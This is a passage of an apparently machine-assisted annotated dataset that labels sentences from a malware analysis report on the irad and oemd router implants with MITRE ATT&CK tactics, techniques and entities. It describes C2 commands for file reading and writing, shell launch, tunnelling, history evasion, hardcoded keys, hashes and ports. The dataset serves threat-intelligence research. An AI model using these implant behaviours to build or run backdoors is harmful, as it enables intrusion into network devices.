"relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Encode and send same AUTH token back for mutual authentication", "entities": [ { "text": "Encode and send the same AUTH token back.", "start": 0, "end": 41, "label": "Action" }, { "text": "AUTH token", "start": 25, "end": 35, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p18-s262-19875d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 262, "context_before": "Encode and send the same AUTH token back.", "sentence_text": "Protocol Diagram\nThe diagram below shows the communication protocol for the irad implant in the server or client mode.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p18-s263-f90aa7", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 263, "context_before": "Protocol Diagram\nThe diagram below shows the communication protocol for the irad implant in the server or client mode.", "sentence_text": "After the ACTIVATE_MODE message, all messages are encoded using a custom encryption algorithm.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Encode all messages with custom encryption after ACTIVATE_MODE", "entities": [ { "text": "all messages are encoded", "start": 33, "end": 57, "label": "Action" }, { "text": "ACTIVATE_MODE message", "start": 10, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "custom encryption algorithm.", "start": 66, "end": 94, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p18-s264-8e5ddc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 264, "context_before": "After the ACTIVATE_MODE message, all messages are encoded using a custom encryption algorithm.", "sentence_text": "Command Details\nThe various commands received by the irad implant are explained in the section below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p18-s265-6ef146", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 265, "context_before": "Command Details\nThe various commands received by the irad implant are explained in the section below.", "sentence_text": "For each command, the irad server or client reads a single byte from the connected socket and performs the action denoted by the value of that byte (after decoding it).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p18-s266-770fe1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 266, "context_before": "For each command, the irad server or client reads a single byte from the connected socket and performs the action denoted by the value of that byte (after decoding it).", "sentence_text": "Command \\x01 (Client and Server Mode) - Read a File", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p18-s267-9c0fd1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 267, "context_before": "Command \\x01 (Client and Server Mode) - Read a File", "sentence_text": "The command \\x01 is used to read a file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p18-s268-f730a1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 268, "context_before": "The command \\x01 is used to read a file.", "sentence_text": "The path to the file to be read is received over the socket in an encoded format.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p18-s269-d7246c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 269, "context_before": "The path to the file to be read is received over the socket in an encoded format.", "sentence_text": "The file is then opened and read 4KB at a time and each 4KB block is encoded and returned to the C2.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Read file 4KB blocks, encode and return to C2", "entities": [ { "text": "file is then opened and read 4KB at a time", "start": 4, "end": 46, "label": "Action" }, { "text": "each 4KB block is encoded and returned to the C2.", "start": 51, "end": 100, "label": "Action" }, { "text": "4KB block", "start": 56, "end": 65, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p18-s270-52324f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 270, "context_before": "The file is then opened and read 4KB at a time and each 4KB block is encoded and returned to the C2.", "sentence_text": "Command \\x02 (Client and Server Mode) - Write a File The command \\x02 is used to write a file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Write file using command \\x02 in client and server modes", "entities": [ { "text": "Write a File", "start": 40, "end": 52, "label": "Action" }, { "text": "Command \\x02", "start": 0, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "Client and Server Mode", "start": 14, "end": 36, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p18-s271-026358", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 271, "context_before": "Command \\x02 (Client and Server Mode) - Write a File The command \\x02 is used to write a file.", "sentence_text": "The path to be written is received over the socket in an encoded format.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Receive encoded file path from socket for writing", "entities": [ { "text": "path to be written is received over the socket", "start": 4, "end": 50, "label": "Action" }, { "text": "encoded format.", "start": 57, "end": 72, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p18-s272-9bb001", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 272, "context_before": "The path to be written is received over the socket in an encoded format.", "sentence_text": "The file is then created using creat().", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Create file using creat() system call", "entities": [ { "text": "file is then created using creat()", "start": 4, "end": 38, "label": "Action" }, { "text": "creat().", "start": 31, "end": 39, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p18-s273-02e2a1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 273, "context_before": "The file is then created using creat().", "sentence_text": "Command \\x03 (Client and Server Mode) - Start a Shell The command \\x03 is used to execute a command.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Execute command using command \\x03 in client and server modes", "entities": [ { "text": "Command \\x03", "start": 0, "end": 12, "label": "Infrastructure_Indicator" }, { "text": " Start a Shell", "start": 39, "end": 53, "label": "Action" }, { "text": "execute a command.", "start": 82, "end": 100, "label": "Action" }, { "text": "Client and Server Mode", "start": 14, "end": 36, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p18-s274-6f930c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 274, "context_before": "Command \\x03 (Client and Server Mode) - Start a Shell The command \\x03 is used to execute a command.", "sentence_text": "Like jdosd, the HISTFILE environment variable is first unset.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Unset HISTFILE environment variable before shell execution", "entities": [ { "text": "HISTFILE environment variable is first unset.", "start": 16, "end": 61, "label": "Action" }, { "text": "HISTFILE environment variable", "start": 16, "end": 45, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p18-s275-94fd19", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 18, "sentence_id": 275, "context_before": "Like jdosd, the HISTFILE environment variable is first unset.", "sentence_text": "Then the TERM environment variable is set to a value received from the C2.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Set TERM environment variable from C2 value", "entities": [ { "text": "TERM environment variable is set", "start": 9, "end": 41, "label": "Action" }, { "text": "value received from the C2.", "start": 47, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p19-s276-efa375", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 276, "context_before": "Then the TERM environment variable is set to a value received from the C2.", "sentence_text": "Command \\x05 (Server Mode) - Create a Tunnel The command \\x05 in server mode is used to create a tunnel between the C2 and another IP address which is received as a part of this commands message exchange.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Create tunnel between C2 and target IP using command \\x05", "entities": [ { "text": "Command \\x05", "start": 0, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "Server Mode", "start": 14, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "Create a Tunnel", "start": 29, "end": 44, "label": "Action" }, { "text": "tunnel between the C2 and another IP address", "start": 97, "end": 141, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p19-s277-29071c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 277, "context_before": "Command \\x05 (Server Mode) - Create a Tunnel The command \\x05 in server mode is used to create a tunnel between the C2 and another IP address which is received as a part of this commands message exchange.", "sentence_text": "This command is used to connect two instances of the irad to the same C2.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Connect two irad instances to same C2 via tunneling", "entities": [ { "text": "irad", "start": 53, "end": 57, "label": "MalwareTool" }, { "text": "connect two instances of the irad to the same C2.", "start": 24, "end": 73, "label": "Action" }, { "text": "C2.", "start": 70, "end": 73, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p19-s278-6d2d50", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 278, "context_before": "This command is used to connect two instances of the irad to the same C2.", "sentence_text": "The \"Auth Key 2\" is used in this case to authenticate the C2 again.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Use Auth Key 2 for C2 re-authentication in tunneling", "entities": [ { "text": "authenticate the C2 again.", "start": 41, "end": 67, "label": "Action" }, { "text": "Auth Key 2", "start": 5, "end": 15, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p19-s279-3b3256", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 279, "context_before": "The \"Auth Key 2\" is used in this case to authenticate the C2 again.", "sentence_text": "Call Graph\nThe call graph for the irad implant is given below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p19-s280-6f7e56", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 280, "context_before": "Call Graph\nThe call graph for the irad implant is given below.", "sentence_text": "Junos OS Specific Actions", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p19-s281-252d99", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 281, "context_before": "Junos OS Specific Actions", "sentence_text": "The use of the csh shell to start a shell on the device seems to be a Junos OS specific action taken by the irad implant.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Use csh shell for Junos OS specific shell execution", "entities": [ { "text": "irad implant.", "start": 108, "end": 121, "label": "MalwareTool" }, { "text": "csh shell", "start": 15, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "Junos OS", "start": 70, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "start a shell on the device", "start": 28, "end": 55, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p19-s282-b8a2c0", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 282, "context_before": "The use of the csh shell to start a shell on the device seems to be a Junos OS specific action taken by the irad implant.", "sentence_text": "Besides this, no other Junos OS specific behavior is observed for this implant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p19-s283-f79ca1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 283, "context_before": "Besides this, no other Junos OS specific behavior is observed for this implant.", "sentence_text": "The Obscure Enigmatic Malware Daemon (oemd)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Obscure Enigmatic Malware Daemon (oemd) identification", "entities": [ { "text": "Obscure Enigmatic Malware Daemon (oemd)", "start": 4, "end": 43, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p19-s284-0cfecd", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 284, "context_before": "The Obscure Enigmatic Malware Daemon (oemd)", "sentence_text": "The Obscure Enigmatic Malware Daemon (oemd) is a basic Remote Access Toolkit to the TinySHell implant.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "oemd as basic RAT connected to TinySHell implant", "entities": [ { "text": "TinySHell implant", "start": 84, "end": 101, "label": "MalwareTool" }, { "text": "Remote Access Toolkit", "start": 55, "end": 76, "label": "MalwareTool" }, { "text": "Obscure Enigmatic Malware Daemon (oemd)", "start": 4, "end": 43, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p19-s285-72f65a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 285, "context_before": "The Obscure Enigmatic Malware Daemon (oemd) is a basic Remote Access Toolkit to the TinySHell implant.", "sentence_text": "This uses encryption/decryption mechanisms with a hard-coded key, and the same key is later utilized in the hashing and message verification mechanism.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Uses hard-coded key for encryption/decryption and message verification", "entities": [ { "text": "encryption/decryption mechanisms", "start": 10, "end": 42, "label": "Action" }, { "text": "hard-coded key,", "start": 50, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "hashing and message verification mechanism.", "start": 108, "end": 151, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p19-s286-65dfcf", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 286, "context_before": "This uses encryption/decryption mechanisms with a hard-coded key, and the same key is later utilized in the hashing and message verification mechanism.", "sentence_text": "Beyond this one command, there’s no evidence that this can run only on routers running Junos OS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p19-s287-b9ad35", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 19, "sentence_id": 287, "context_before": "Beyond this one command, there’s no evidence that this can run only on routers running Junos OS.", "sentence_text": "Executable File Details Title Description File Name oemd File Path /usr/sbin/oemd", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deployment of oemd executable to /usr/sbin/", "entities": [ { "text": "oemd", "start": 52, "end": 56, "label": "MalwareTool" }, { "text": "/usr/sbin/oemd", "start": 67, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p20-s288-63a810", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 288, "context_before": "Executable File Details Title Description File Name oemd File Path /usr/sbin/oemd", "sentence_text": "File Type oemd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped File Size 46192 bytes SHA1 Hash cf7af504ef0796d91207e41815187a793d430d85 SHA256 Hash 905b18d5df58dd6c16930e318d9574a2ad793ec993ad2f68bca813574e3d854b", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "oemd malware file with detailed hash identifiers", "entities": [ { "text": "oemd", "start": 10, "end": 14, "label": "MalwareTool" }, { "text": "ELF 32-bit LSB executable", "start": 16, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "FreeBSD", "start": 67, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "SHA1 Hash cf7af504ef0796d91207e41815187a793d430d85", "start": 179, "end": 229, "label": "Infrastructure_Indicator" }, { "text": "SHA256 Hash 905b18d5df58dd6c16930e318d9574a2ad793ec993ad2f68bca813574e3d854b", "start": 230, "end": 306, "label": "Infrastructure_Indicator" }, { "text": "FreeBSD 6.4", "start": 135, "end": 146, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p20-s289-f1e415", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 289, "context_before": "File Type oemd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped File Size 46192 bytes SHA1 Hash cf7af504ef0796d91207e41815187a793d430d85 SHA256 Hash 905b18d5df58dd6c16930e318d9574a2ad793ec993ad2f68bca813574e3d854b", "sentence_text": "ssdeep hash 768:yCe+4hEkjX1E5J9Fd2j79dX9i/ELazdceahodS4A:9Hq1rJH9l9eELaz2sdS4A Implant Analysis The oemd daemon picks up activation data from several environment variables.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1608.001", "name": "Upload Malware" } ], "procedure": "oemd daemon reads activation data from environment variables", "entities": [ { "text": "oemd daemon", "start": 100, "end": 111, "label": "MalwareTool" }, { "text": "picks up activation data", "start": 112, "end": 136, "label": "Action" }, { "text": "environment variables", "start": 150, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "ssdeep hash 768:yCe+4hEkjX1E5J9Fd2j79dX9i/ELazdceahodS4A:9Hq1rJH9l9eELaz2sdS4A", "start": 0, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p20-s290-19d9ac", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 290, "context_before": "ssdeep hash 768:yCe+4hEkjX1E5J9Fd2j79dX9i/ELazdceahodS4A:9Hq1rJH9l9eELaz2sdS4A Implant Analysis The oemd daemon picks up activation data from several environment variables.", "sentence_text": "It hard codes the amount of memory it can use on the system to avoid detection and daemonizes itself.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Hard code memory usage limits and daemonize to avoid detection", "entities": [ { "text": "daemonizes itself.", "start": 83, "end": 101, "label": "Action" }, { "text": "avoid detection", "start": 63, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "hard codes the amount of memory it can use", "start": 3, "end": 45, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p20-s291-34248c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 291, "context_before": "It hard codes the amount of memory it can use on the system to avoid detection and daemonizes itself.", "sentence_text": "Artifacts Found\nArtifact Name Description Secret Key 1", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Secret Key 1 artifact for C2 communication", "entities": [ { "text": "Secret Key 1", "start": 42, "end": 54, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p20-s292-83b9bf", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 292, "context_before": "Artifacts Found\nArtifact Name Description Secret Key 1", "sentence_text": "A hardcoded Secret key was found at virtual address 0x08050353 with the value 88-e8b17616fbbd Secret Key 2 A hardcoded Secret key was found at virtual address 0x0805032e with the value c7-000c2906024e Command String A command string which seems to be directly executing ifinfo oemd Activation Details", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Multiple hardcoded secret keys and command string for execution", "entities": [ { "text": "virtual address 0x08050353", "start": 36, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0x0805032e", "start": 143, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "Secret key", "start": 12, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "88-e8b17616fbbd", "start": 78, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "Secret key", "start": 119, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "c7-000c2906024e", "start": 185, "end": 200, "label": "Infrastructure_Indicator" }, { "text": "command string which seems to be directly executing ifinfo oemd ", "start": 218, "end": 282, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p20-s293-38955e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 293, "context_before": "A hardcoded Secret key was found at virtual address 0x08050353 with the value 88-e8b17616fbbd Secret Key 2 A hardcoded Secret key was found at virtual address 0x0805032e with the value c7-000c2906024e Command String A command string which seems to be directly executing ifinfo oemd Activation Details", "sentence_text": "The oemd daemon gets a few of its initialization parameters from environment variables.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1608.001", "name": "Upload Malware" } ], "procedure": "oemd daemon reads initialization parameters from environment variables", "entities": [ { "text": "oemd daemon", "start": 4, "end": 15, "label": "MalwareTool" }, { "text": "gets a few of its initialization parameters", "start": 16, "end": 59, "label": "Action" }, { "text": "environment variables", "start": 65, "end": 86, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p20-s294-2025b8", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 294, "context_before": "The oemd daemon gets a few of its initialization parameters from environment variables.", "sentence_text": "We speculate this is done so that the malware does not take up too many resources and get discovered.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p20-s295-41c732", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 295, "context_before": "We speculate this is done so that the malware does not take up too many resources and get discovered.", "sentence_text": "It then checks for the UPRT environment variable and if it isn't set, automatically configures the malware to run at port 45678.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Check UPRT environment variable and default to port 45678", "entities": [ { "text": "malware", "start": 99, "end": 106, "label": "MalwareTool" }, { "text": "UPRT environment variable", "start": 23, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "port 45678.", "start": 117, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "automatically configures", "start": 70, "end": 94, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p20-s296-b60ee9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 296, "context_before": "It then checks for the UPRT environment variable and if it isn't set, automatically configures the malware to run at port 45678.", "sentence_text": "It then becomes a daemon(2).", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Daemonize process using daemon(2) system call", "entities": [ { "text": "becomes a daemon(2)", "start": 8, "end": 27, "label": "Action" }, { "text": "daemon(2)", "start": 18, "end": 27, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p20-s297-568770", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 297, "context_before": "It then becomes a daemon(2).", "sentence_text": "Setting up the Listener", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p20-s298-5bbc0e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 298, "context_before": "Setting up the Listener", "sentence_text": "The parent function passes the interface value(s) via the INTFS environment variable.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Parent function passes interface values via INTFS environment variable", "entities": [ { "text": "passes the interface value(s)", "start": 20, "end": 49, "label": "Action" }, { "text": "INTFS environment variable.", "start": 58, "end": 85, "label": "Infrastructure_Indicator" }, { "text": "parent function", "start": 4, "end": 19, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p20-s299-0e7ff1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 299, "context_before": "The parent function passes the interface value(s) via the INTFS environment variable.", "sentence_text": "This environment variable may have a comma (,) separated list of interfaces.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Parse comma-separated interface list from INTFS environment variable", "entities": [ { "text": " comma (,) separated list of interfaces.", "start": 36, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p20-s300-e53f3e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 20, "sentence_id": 300, "context_before": "This environment variable may have a comma (,) separated list of interfaces.", "sentence_text": "For each of these interfaces, two things happen:\nThe \"Interface index\" is read.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Read interface index for each interface in list", "entities": [ { "text": "\"Interface index\" is read.", "start": 53, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "Interface index", "start": 54, "end": 69, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s301-80cd78", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 301, "context_before": "For each of these interfaces, two things happen:\nThe \"Interface index\" is read.", "sentence_text": "Global memory is initialized where the Interface Index is stored.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Initialize global memory for storing Interface Index", "entities": [ { "text": "is stored.", "start": 55, "end": 65, "label": "Action" }, { "text": "Global memory is initialized", "start": 0, "end": 28, "label": "Action" }, { "text": "Interface Index", "start": 39, "end": 54, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s302-c2370c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 302, "context_before": "Global memory is initialized where the Interface Index is stored.", "sentence_text": "If both the above steps are successfully completed, then the listening infrastructure is set up.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p21-s303-316f08", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 303, "context_before": "If both the above steps are successfully completed, then the listening infrastructure is set up.", "sentence_text": "A UDP Socket with custom options of 0x4 and 0x200 is initialized on the port number received from the environment variable UPRT.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Initialize UDP socket with custom options 0x4 and 0x200 on UPRT port", "entities": [ { "text": "UDP Socket with custom options of 0x4 and 0x200 is initialized", "start": 2, "end": 64, "label": "Action" }, { "text": "custom options of 0x4 and 0x200", "start": 18, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "UDP Socket", "start": 2, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "port number received from the environment variable", "start": 72, "end": 122, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s304-a7b561", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 304, "context_before": "A UDP Socket with custom options of 0x4 and 0x200 is initialized on the port number received from the environment variable UPRT.", "sentence_text": "More Socket Options of 0x6b or 0x6d are set up and the UDP port is bound.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Set socket options 0x6b or 0x6d and bind UDP port", "entities": [ { "text": "Socket Options of 0x6b or 0x6d are set up", "start": 5, "end": 46, "label": "Action" }, { "text": " Options of 0x6b or 0x6d", "start": 11, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "UDP port is bound", "start": 55, "end": 72, "label": "Action" }, { "text": "UDP port", "start": 55, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s305-b893a1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 305, "context_before": "More Socket Options of 0x6b or 0x6d are set up and the UDP port is bound.", "sentence_text": "If the binding is successful, more data including the index is written to global data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p21-s306-b03160", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 306, "context_before": "If the binding is successful, more data including the index is written to global data.", "sentence_text": "If the RTS environment variable is initialized, then the Interface Index is picked up from there.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Read Interface Index from RTS environment variable if initialized", "entities": [ { "text": "RTS environment variable", "start": 7, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "Interface Index", "start": 57, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "Interface Index is picked up from there.", "start": 57, "end": 97, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p21-s307-659e77", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 307, 